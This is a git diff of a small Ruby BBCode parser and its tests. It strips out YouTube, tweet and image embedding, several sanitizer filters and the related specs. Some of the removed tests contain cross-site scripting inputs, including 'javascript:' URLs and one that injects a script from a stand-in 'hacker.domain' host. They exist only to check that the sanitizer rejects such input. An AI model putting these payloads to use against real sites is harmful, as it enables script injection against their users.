2 changed files with 29 additions and 337 deletions
--- a/bristlecode.rb
+++ b/bristlecode.rb
@@ -1,92 +1,30 @@
 require 'parslet'
 require 'sanitize'
-require 'uri'

 module Bristlecode

-  class YoutubeFilter
-    def call(env)
-      node = env[:node]
-      node_name = env[:node_name]
-      return if env[:is_whitelisted] || !node.element?
-      return unless node_name == 'iframe'
-      return unless node['src'] =~ %r|\A(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/|
-      Sanitize.node!(node, {
-        :elements => %w[iframe],
-        :attributes => {'iframe'  => %w[allowfullscreen frameborder height src width]}
-      })
-      {:node_whitelist => [node]}
-    end
-  end
-
-  class TweetFilter
-    def call(env)
-      node = env[:node]
-      node_name = env[:node_name]
-      return if env[:is_whitelisted] || !node.element?
-      case node_name
-      when 'script'
-        return script env
-      when 'blockquote'
-        return blockquote env
-      else
-        return
-      end
-    end
-
-    def script(env)
-      node = env[:node]
-      return unless node['src'] == "//platform.twitter.com/widgets.js"
-      Sanitize.node!(node, {
-        :elements => %w[script],
-        :attributes => {'script'  => %w[aync src charset]}
-      })
-      {:node_whitelist => [node]}
-    end
-
-    def blockquote(env)
-      node = env[:node]
-      Sanitize.node!(node, {
-        :elements => %w[blockquote a],
-        :attributes => {'blockquote'  => ['class'], 'a' => ['href']}
-      })
-      {:node_whitelist => [node]}
-    end
-  end
-
  Config = Sanitize::Config::freeze_config(
-    :elements => %w[b em i strong u a strike br img],
+    :elements => %w[b em i strong u a strike br],
    :attributes => {
-      'a' => ['href'],
-      'img' => ['src'],
+      'a' => ['href']
    },
    :add_attributes => {
      'a' => {'rel' => 'nofollow'}
    },
    :protocols => {
      'a' => {'href' => ['http', 'https', :relative]}
-    },
-    :transformers => [YoutubeFilter.new, TweetFilter.new],
-    :remove_contents => ['script']
+    }
  )

  def Bristlecode.to_html(text)
-    begin
-      parser = Bristlecode::Parser.new
-      parse_tree = parser.parse(text)
-      tree = Bristlecode::Transform.new.apply(parse_tree)
-      html = tree.to_html
-    rescue Parslet::ParseFailed => parse_error
-      html = text
-    end
-    Bristlecode.sanitize_html(html)
-  end
-
-  def Bristlecode.sanitize_html(html)
+    parser = Bristlecode::Parser.new
+    parse_tree = parser.parse(text)
+    tree = Bristlecode::Transform.new.apply(parse_tree)
+    html = tree.to_html
    Sanitize.fragment(html, Bristlecode::Config)
  end

-  def Bristlecode.clean!(text)
+  def Bristlecode.clean(text)
    text.gsub!('&', '&amp;')
    text.gsub!('<', '&lt;')
    text.gsub!('>', '&gt;')
@@ -96,6 +34,9 @@ module Bristlecode
  end

  class Parser < Parslet::Parser
+    rule(:space) { match('\s').repeat(1) }
+    rule(:space?) { space.maybe }
+
    rule(:bold_open) { str('[b]') | str('[B]') }
    rule(:bold_close) { str('[/b]') | str('[/B]') | eof }
    rule(:bold) { bold_open >> children.as(:bold) >> bold_close }
@@ -111,7 +52,7 @@ module Bristlecode
    rule(:simple_href) { (url_close.absent? >> any).repeat }
    rule(:simple_url) { url_open >> simple_href.as(:href) >> url_close }
    rule(:url_title_open) { str('[url=') }
-    rule(:url_title_href) { (match(']').absent? >> any).repeat(1) }
+    rule(:url_title_href) { (match(']').absent? >> any).repeat }
    rule(:url_with_title) {
      url_title_open >>
      url_title_href.as(:href) >>
@@ -121,33 +62,16 @@ module Bristlecode
    }
    rule(:url) { (simple_url | url_with_title).as(:url) }

-    rule(:youtube_open) { str('[youtube]') }
-    rule(:youtube_close) { str('[/youtube]') }
-    rule(:youtube_url) { (youtube_close.absent? >> any).repeat(1) }
-    rule(:youtube) { (youtube_open >> youtube_url.as(:src) >> youtube_close).as(:youtube) }
-
-    rule(:tweet_open) { str('[tweet]') }
-    rule(:tweet_close) { str('[/tweet]') }
-    rule(:tweet_url) { (tweet_close.absent? >> any).repeat(1) }
-    rule(:tweet) { (tweet_open >> tweet_url.as(:src) >> tweet_close).as(:tweet) }
-
-    rule(:img_open) { str('[img]') }
-    rule(:img_close) { str('[/img]') }
-    rule(:img_src) { (img_close.absent? >> any).repeat(1) }
-    rule(:img) { (img_open >> img_src.as(:src) >> img_close).as(:img) }
-
    rule(:eof) { any.absent? }
-    rule(:tag) { bold | italic | url | linebreak | img | youtube | tweet }
+    rule(:tag) { bold | italic | url | linebreak }
    rule(:elem) { text.as(:text) | tag }
-    rule(:tag_open) { bold_open | italic_open | url_open | url_title_open | img_open |
-      youtube_open | tweet_open }
-    rule(:tag_close) { bold_close | italic_close | url_close | img_close | youtube_close |
-      tweet_close }
+    rule(:tag_open) { bold_open | italic_open | url_open | url_title_open }
+    rule(:tag_close) { bold_close | italic_close | url_close }
    rule(:tag_delim) { tag_open | tag_close | linebreak }

    rule(:text) { (tag_delim.absent? >> any).repeat(1) }
-    rule(:children) { elem.repeat }
-    rule(:doc) { elem.repeat.as(:doc) }
+    rule(:children) { space? >> elem.repeat }
+    rule(:doc) { space? >> elem.repeat.as(:doc) }
    root(:doc)
  end

@@ -158,9 +82,6 @@ module Bristlecode
    rule(doc: subtree(:doc)) { Doc.new(doc) }
    rule(url: subtree(:url)) { Url.new(url) }
    rule(br: simple(:br)) { Linebreak.new }
-    rule(img: subtree(:img)) { Img.new(img) }
-    rule(youtube: subtree(:youtube)) { Youtube.new(youtube) }
-    rule(tweet: subtree(:tweet)) { Tweet.new(tweet) }
  end

  class Doc
@@ -175,29 +96,19 @@ module Bristlecode
      children.each{|child| s << child.to_html }
      s.string
    end
-
-    def to_text
-      s = StringIO.new
-      children.each{|child| s << child.to_text }
-      s.string
-    end
  end

  class Text
    attr_accessor :text

    def initialize(text)
-      self.text = text.to_str
-      Bristlecode.clean!(self.text)
+      self.text = text.to_str.strip
+      Bristlecode.clean(self.text)
    end

    def to_html
      text
    end
-
-    def to_text
-      text
-    end
  end

  class Bold
@@ -210,10 +121,6 @@ module Bristlecode
    def to_html
      "<b>#{children.to_html}</b>"
    end
-
-    def to_text
-      "[b]#{children.to_text}[/b]"
-    end
  end

  class Italic
@@ -226,145 +133,35 @@ module Bristlecode
    def to_html
      "<i>#{children.to_html}</i>"
    end
-
-    def to_text
-      "[i]#{children.to_text}[/i]"
-    end
  end

  class Url
-    attr_accessor :href, :title, :bad_href, :title_supplied
+    attr_accessor :href, :title

    def initialize(args)
      self.href = args[:href].to_str.strip
+      check_href
      if args.has_key? :title
-        self.title_supplied = true
        self.title = Doc.new(args[:title])
      else
-        self.title_supplied = false
-        self.title = Text.new(args[:href].to_str.strip)
+        self.title = Text.new(href)
      end
    end

-    def href_ok?
-      href =~ /^(\/|https?:\/\/)/
+    def check_href
+      unless href =~ /^(\/[^\/]|https?:\/\/)/
+        raise "href must start with /, http, or https"
+      end
    end

    def to_html
-      return to_text unless href_ok?
      "<a href=\"#{href}\">#{title.to_html}</a>"
    end
-
-    def to_text
-      if title_supplied
-        "[url=#{href}]#{title.to_text}[/url]"
-      else
-        text = "[url]#{href}[/url]"
-        Bristlecode.clean!(text)
-        text
-      end
-    end
  end

  class Linebreak
    def to_html
      "<br>"
    end
-
-    def to_text
-      "[br]"
-    end
-  end
-
-  class Img
-    attr_accessor :src
-
-    def initialize(img)
-      self.src = img[:src].to_str
-    end
-
-    def src_ok?
-      src =~ /^(\/|https?:\/\/)/
-    end
-
-    def to_html
-      return to_text unless src_ok?
-      "<img src=\"#{src}\">"
-    end
-
-    def to_text
-        text = "[img]#{src}[/img]"
-        Bristlecode.clean!(text)
-        text
-    end
-  end
-
-  class Youtube
-    attr_accessor :raw_url, :video_id
-
-    def initialize(args)
-      self.raw_url = args[:src].to_str.strip
-      self.video_id = parse_url
-    end
-
-    def parse_url
-      begin
-        uri = URI::parse(raw_url)
-        return false unless ['http', 'https'].include? uri.scheme
-        return false unless ['www.youtube.com', 'youtube.com', 'youtu.be'].include? uri.host
-        if uri.host == 'youtu.be'
-          return uri.path[1..-1]
-        else
-          URI::decode_www_form(uri.query).each{|key, value| return value if key == 'v'}
-        end
-      rescue URI::InvalidURIError
-      end
-
-      return false
-    end
-
-    def to_html
-      return to_text unless video_id
-      "<iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/#{video_id}\" frameborder=\"0\" allowfullscreen></iframe>"
-    end
-
-    def to_text
-      text = "[youtube]#{raw_url}[/youtube]"
-      Bristlecode.clean!(text)
-      text
-    end
-  end
-
-  class Tweet
-    attr_accessor :raw_url, :tweet_url
-
-    def initialize(tweet)
-      self.raw_url = tweet[:src].to_str.strip
-      self.tweet_url = parse_url(self.raw_url)
-    end
-
-    def parse_url(url_in)
-      begin
-        uri = URI::parse(url_in)
-        return false unless ['http', 'https'].include? uri.scheme
-        return false unless uri.host == 'twitter.com'
-        return false unless uri.path =~ /^\/[^\/]+\/status\/\d+/
-        # strip querystring and fragment
-        return "#{uri.scheme}://#{uri.host}#{uri.path}"
-      rescue URI::InvalidURIError
-      end
-      return false
-    end
-
-    def to_html
-      return to_text unless tweet_url
-      "<blockquote class=\"twitter-tweet\"><a href=\"#{tweet_url}\"></a></blockquote><script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>"
-    end
-
-    def to_text
-      text = "[tweet]#{raw_url}[/tweet]"
-      Bristlecode.clean!(text)
-      text
-    end
  end
 end
--- a/spec/bristlecode/parser_spec.rb
+++ b/spec/bristlecode/parser_spec.rb
@@ -9,17 +9,12 @@ module Bristlecode
      Bristlecode.to_html(text)
    end

-    def sanitize_html(text)
-      Bristlecode.sanitize_html(text)
-    end
-
    it 'leaves an empty string unchanged' do
      expect(to_html("")).to eq("")
    end

    it 'handles empty documents' do
-      text = "      \t   \n    \n     \t"
-      expect(to_html(text)).to eq(text)
+      expect(to_html("      \t   \n    \n     \t")).to eq("")
    end

    it 'handles special chars' do
@@ -28,17 +23,6 @@ module Bristlecode
      expect(to_html('<')).to eq('&lt;')
    end

-    it 'escapes tags' do
-      input = '<script>alert(1)</script>'
-      output = '&lt;script&gt;alert(1)&lt;/script&gt;'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'entirely removes unapproved script tags in sanitization' do
-      input = '<script>alert(1)</script>'
-      expect(sanitize_html(input)).to eq('')
-    end
-
    it 'handles plain text just fine' do
      expect(to_html("plaintext")).to eq("plaintext")
    end
@@ -53,12 +37,12 @@ module Bristlecode

    it 'can nest tags' do
      doc = '[b] bold [i] italic [/i] bold [/b]'
-      expected = '<b> bold <i> italic </i> bold </b>'
+      expected = '<b>bold<i>italic</i>bold</b>'
      out = to_html(doc)
      expect(out).to eq(expected)

      doc = '[i] italic [b] bold [/b] italic [/i]'
-      expected = '<i> italic <b> bold </b> italic </i>'
+      expected = '<i>italic<b>bold</b>italic</i>'
      out = to_html(doc)
      expect(out).to eq(expected)
    end
@@ -72,9 +56,7 @@ module Bristlecode
      input = '[url]http://example.com[/url]'
      output = '<a href="http://example.com" rel="nofollow">http://example.com</a>'
      expect(to_html(input)).to eq(output)
-    end

-    it 'trims whitespace around urls' do
      input = '[url]    http://example.com    [/url]'
      output = '<a href="http://example.com" rel="nofollow">http://example.com</a>'
      expect(to_html(input)).to eq(output)
@@ -92,89 +74,9 @@ module Bristlecode
      expect(to_html(input)).to eq(output)
    end

-    it 'ignores url tags with bad protocols' do
-      input = '[url=javascript:alert(1)]google.com[/url]'
-      expect(to_html(input)).to eq(input)
-
-      input = '[url=ftp://something.com/filez]google.com[/url]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it 'allows subtrees in <a> tags' do
-      input = '[url=http://google.com]this is [b]the[/b] google[/url]'
-      output = '<a href="http://google.com" rel="nofollow">this is <b>the</b> google</a>'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'rejects bad url protocols' do
-      input = "[url=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]"
-      expect(to_html(input)).to eq(input)
-
-      input = "[url=ftp://whatever.com/etc]warez[/url]"
-      expect(to_html(input)).to eq(input)
-    end
-
    it 'renders a linebreak' do
      expect(to_html('[br]')).to eq('<br>')
    end
-
-    it 'renders an image' do
-      input = '[img]http://example.com/cat.gif[/img]'
-      expect(to_html(input)).to eq('<img src="http://example.com/cat.gif">')
-    end
-
-    it 'ignores bad image src protocols' do
-      input = '[img]javascript:alert(1)[/img]'
-      expect(to_html(input)).to eq(input)
-
-      input = '[img]ftp://example.com/cat.gif[/img]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it 'returns the original text on parse failure' do
-      input = '[img]http://example.com/dog.gif[img]http://example.com/cat.gif[/img][/img]'
-      expect(to_html(input)).to eq(input)
-
-      input = '[url][url]x[/url][/url]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it 'can render a youtube video with a watch link' do
-      input = '[youtube]https://youtube.com/watch?v=uxpDa-c-4Mc[/youtube]'
-      output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
-      expect(to_html(input)).to eq(output)
-
-      input = '[youtube]https://www.youtube.com/watch?v=uxpDa-c-4Mc[/youtube]'
-      output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'can render a youtube video with a share link' do
-      input = '[youtube]https://youtu.be/uxpDa-c-4Mc[/youtube]'
-      output = '<iframe width="560" height="315" src="https://www.youtube.com/embed/uxpDa-c-4Mc" frameborder="0" allowfullscreen=""></iframe>'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'refuses bad youtube urls' do
-      input = '[youtube]http://example.com/cats.gif[/youtube]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it "requires full url for youtube vids" do
-      input = '[youtube]dQw4w9WgXcQ[/youtube]'
-      expect(to_html(input)).to eq(input)
-    end
-
-    it 'can render a tweet' do
-      input = '[tweet]https://twitter.com/jordanorelli/status/662654098156748800[/tweet]'
-      output = '<blockquote class="twitter-tweet"><a href="https://twitter.com/jordanorelli/status/662654098156748800" rel="nofollow"></a></blockquote><script src="//platform.twitter.com/widgets.js" charset="utf-8"></script>'
-      expect(to_html(input)).to eq(output)
-    end
-
-    it 'requres the full url for a tweet' do
-      input = '[tweet]662654098156748800[/tweet]'
-      expect(to_html(input)).to eq(input)
-    end
  end

  describe Parser do
@@ -288,12 +190,5 @@ module Bristlecode
        expect(parser.linebreak).to parse('[br]')
      end
    end
-
-    describe '#img' do
-      it 'accepts valid image urls' do
-        expect(parser.img).to parse('[img]http://example.com/something.gif[/img]')
-        expect(parser.img).to parse('[img]https://example.com/something.gif[/img]')
-      end
-    end
  end
 end